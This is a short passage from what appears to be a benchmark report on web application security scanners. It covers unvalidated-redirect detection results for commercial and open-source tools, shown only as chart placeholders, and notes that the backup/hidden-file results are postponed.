[Chart: Unvalidated Redirect Benchmark - Commercial Vendors]


* The results of appscan DO NOT REFLECT the latest version of the product, which is still under evaluation. The vendor has already proclaimed that the result has drastically improved compared to the previous version.

The following table presents the unvalidated redirect detection / false-positive ratio of open source DAST projects:

[Chart: Unvalidated Redirect Benchmark - Open Source Vendors]



3.10 The Detection Ratio of Backup/Hidden Files (Update)


The backup file results will be published in the upcoming weeks, due to vendor specific-bugs, licensing issues and time-frame constraints.